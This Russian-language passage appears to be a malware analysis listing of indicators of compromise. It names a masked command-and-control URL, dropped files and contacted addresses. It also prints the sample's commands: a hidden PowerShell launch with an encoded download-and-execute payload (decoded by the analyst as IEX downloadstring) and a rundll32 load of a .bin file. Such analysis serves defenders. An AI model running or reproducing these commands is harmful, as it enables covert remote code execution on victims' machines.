Техническая информация
- http://46.#.19.136/boogyman.php
- <SYSTEM32>\wermgr.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\rmejgz.bin
- '46.#.19.136':80
- '10#.#45.146.219':80
- '74.##.157.139':443
- '38.##0.103.124':443
- 'microsoft.com':80
- '68.##.26.182':443
- '38.##0.103.124':443
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...' (со скрытым окном; аргумент -enc — base64 от строки в UTF-16LE, видимый фрагмент декодируется в `IEX (New-Object Net.Webclient).downloadstring("http://46...` — то есть загрузка и выполнение скрипта с адреса 46.#.19.136, указанного в первом пункте; флаги -nop -w hidden -ep bypass отключают профиль, скрывают окно и обходят политику выполнения)
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...
- '<SYSTEM32>\rundll32.exe' %TEMP%\RMEjgz.bin StartW (тот же файл, что и %TEMP%\rmejgz.bin выше — на Windows имена файлов регистронезависимы; вероятно, .bin загружается как DLL с вызовом экспорта StartW, что позволяет запускать код без расширения .dll)
- '<SYSTEM32>\wermgr.exe'